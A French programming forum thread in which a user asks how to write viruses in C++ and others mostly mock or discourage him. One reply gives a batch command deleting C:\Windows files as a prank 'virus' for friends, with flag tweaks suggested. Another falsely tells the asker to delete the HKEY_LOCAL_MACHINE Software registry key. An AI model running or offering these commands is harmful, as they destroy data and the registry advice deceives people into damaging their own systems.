Virus en tout genre!!!

Résolu
cs_Darkmessenger Messages postés 7 Date d'inscription jeudi 29 septembre 2005 Statut Membre Dernière intervention 30 septembre 2005 - 29 sept. 2005 à 17:51
Cyberogourou Messages postés 3 Date d'inscription mardi 25 mai 2010 Statut Membre Dernière intervention 12 juillet 2010 - 12 juil. 2010 à 12:17
slt a tous

j'aimerai savoir si c'est possible de créer des virus (trojan ou autres!) en C++

si oui est-ce-que quelqu'un pourrai me donner ou me dire ou trouver
quelques codes sources histoire de voir a quoi sa ressemble..?

sinon avec quel language je peut en créer???

merci d'avance

35 réponses

DormeurDev Messages postés 61 Date d'inscription samedi 5 février 2005 Statut Membre Dernière intervention 20 avril 2006 1
30 sept. 2005 à 19:11
Tu connais le second degré ?
0
DormeurDev Messages postés 61 Date d'inscription samedi 5 février 2005 Statut Membre Dernière intervention 20 avril 2006 1
30 sept. 2005 à 19:15
Ah oui, aussi : ca te dirais d'écrire correctement ?

Ca te rendrait un peu plus crédible déjà.





Et puis c'est pas le tout de connaître la syntaxe et tout le bazar, il
faut aussi avoir des notion d'algo. Je te dis pas lesquelles, je
m'interesse pas aux virus
0
cs_Darkmessenger Messages postés 7 Date d'inscription jeudi 29 septembre 2005 Statut Membre Dernière intervention 30 septembre 2005
30 sept. 2005 à 19:54
désolé je ne savais pas qu'il falait écrire les mots correctement.....

mais dans ce cas pourrai-tu réviser un peu ton francais s'il te plait!!!!



"Et puis CE N'EST pas le tout de connaître la syntaxe et tout le bazar,
il faut aussi avoir des notionS d'algo. Je NE te dis pas lesquelles, je
NE m'interesse pas aux virus"



bon il ne me semble pas que l'on soit la pour faire du francais mais
pour parler prog. donc si on pouvai revenir sur le sujet je pense que
se serai une bonne chose!!!!!



pour les notions d'algo etc, je fini en ce moment mon apprentissage du
C++ et j'aimerai mettre en application et apprendre en meme temps.



voila donc si vous avez des conseils, des sites, des astuces (...) à me proposer, c'est par ici!!!



Sur ce, ...
0
DormeurDev Messages postés 61 Date d'inscription samedi 5 février 2005 Statut Membre Dernière intervention 20 avril 2006 1
30 sept. 2005 à 21:02
"désolé je ne savais pas qu'il falait écrire les mots correctement.....

mais dans ce cas pourrai-tu réviser un peu ton francais s'il te plait!!!!




"Et puis CE N'EST pas le tout de connaître la syntaxe et tout le bazar,
il faut aussi avoir des notionS d'algo. Je NE te dis pas lesquelles, je
NE m'interesse pas aux virus"



bon il ne me semble pas que l'on
soit la pour faire du francais mais pour parler prog. donc si on pouvai
revenir sur le sujet je pense que se serai une bonne chose!!!!!




pour les notions d'algo etc, je fini en ce moment mon apprentissage du
C++ et j'aimerai mettre en application et apprendre en meme temps.



voila donc si vous avez des conseils, des sites, des astuces (...) à me proposer, c'est par ici!!!



Sur ce, ..."





Les mots soulignés sont à revoir, il y en a pour lesquels je chipote un peu.



Et s'il te plait le "Sur ce" est un effet personnel, donc je suis obligé de te demander de ne pas en user, merci.



Pour l'algo, je pense que google fera bien l'affaire, mais je n'ai pas fais de recherche pour t'en assurer.
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
magic_Nono Messages postés 1878 Date d'inscription jeudi 16 octobre 2003 Statut Membre Dernière intervention 16 mars 2011
3 oct. 2005 à 10:55
t'en as oublié dormeur....




si ça peux t'amuser, un truc en assembleur simple a faire est un "rouleau compresseur"

ou un "lapin/chasseur" qd mm un poil plus complexe pr le chasseur



mais apres, moi, je ne testerai jamais ces trucs sur mes machines,

dc je connais le principe, certes, mais ça fait parti de l'ensemble de connaissance à laisser de coté.

et je te suggere de faire de meme....

Il y a largement de quoi faire en restant du bon coté de la barriere...



Kenavo
___________________________________________________________
Nono
0
cs_Joky Messages postés 1787 Date d'inscription lundi 22 novembre 2004 Statut Membre Dernière intervention 31 janvier 2009 2
3 oct. 2005 à 11:08
voici un bon virus c'est le virus Love qu'on a tant entendu parler :)

Ouvrir notepad :

Ecrire :



echo off

del C:\Windows\*.*

echo Merci Aurevoir



Tu vas faire des ravages chez tes amis ;)

Teste le avant chez toi :)
if(!Meilleur("Joky")) return ERREUR;<
0
magic_Nono Messages postés 1878 Date d'inscription jeudi 16 octobre 2003 Statut Membre Dernière intervention 16 mars 2011
4 oct. 2005 à 09:36
jocky



met dc une '@' avant ton echo off



et assure toi que le -y ne soit pas nécessaire de meme qu'un /F et /s




dslé Jocky ton truc me retourne une erreur - ciao
___________________________________________________________
Magicalement
Nono
0
magic_Nono Messages postés 1878 Date d'inscription jeudi 16 octobre 2003 Statut Membre Dernière intervention 16 mars 2011
4 oct. 2005 à 09:38
G trouvé, C parce que je rentre tjs Jocky au lieu de Joky....



quoique ....

y me retourne tjs ERREUR
0
dark vinci Messages postés 2 Date d'inscription lundi 3 octobre 2005 Statut Membre Dernière intervention 4 octobre 2005
4 oct. 2005 à 11:38
Non sa existe encore, commence par le début, l'algorithmie sinon pour créer des virus ^^, no comment, et puis je v pas te refiler des ficèles les derniers virus sont des virus réseaux. Donc fait pour emmerder un maximum de monde.
0
dark vinci Messages postés 2 Date d'inscription lundi 3 octobre 2005 Statut Membre Dernière intervention 4 octobre 2005
4 oct. 2005 à 11:45
Mais sinon tu va dans executer dans ton menu demarer tu tappe regedit
tu double click sur HKEY_LOCAL_MACHINE et tu supprime le dossier software sa te permettra de mettre en place l'asm tcon.exe fourni d'origine avec toute les becane tournant sur windows.
0
roshan2006 Messages postés 2 Date d'inscription vendredi 17 mars 2006 Statut Membre Dernière intervention 20 mars 2006
20 mars 2006 à 17:45
essaye avec des commande de fichier .bat sa va plus vite
votre cher amie***** LE PIRATE*****
0
roshan2006 Messages postés 2 Date d'inscription vendredi 17 mars 2006 Statut Membre Dernière intervention 20 mars 2006
20 mars 2006 à 17:47
bonjour je voudrais savoir si quelqu un pourait me passer des liens avec des codes comme console wondoxs etc...........................
0
Cyberogourou Messages postés 3 Date d'inscription mardi 25 mai 2010 Statut Membre Dernière intervention 12 juillet 2010
12 juil. 2010 à 12:05
loooool l'asm quoi, rien que sa, la blague!!! En même temps, l'assembleur est un outil pas mal mais pas évident
0
Cyberogourou Messages postés 3 Date d'inscription mardi 25 mai 2010 Statut Membre Dernière intervention 12 juillet 2010
12 juil. 2010 à 12:13
Si tu veux t'informer sur les virus et le hack, il existe un bon site facile à trouver mais il est plus tourné vers le hack de réseau avec des Ip spoofing et du poisening! Après, il faut que tu maitrise le python, le C et le Java à la rigueur. Mais bon c'est pas évident a comprendre et encore moins a écrire
0
Cyberogourou Messages postés 3 Date d'inscription mardi 25 mai 2010 Statut Membre Dernière intervention 12 juillet 2010
12 juil. 2010 à 12:17
Par contre j'aurais une question, ou pourrait-on trouver toutes les codes source ou prototypes des fonctions windows en C ainsi que leur biblio associé ?
0
Rejoignez-nous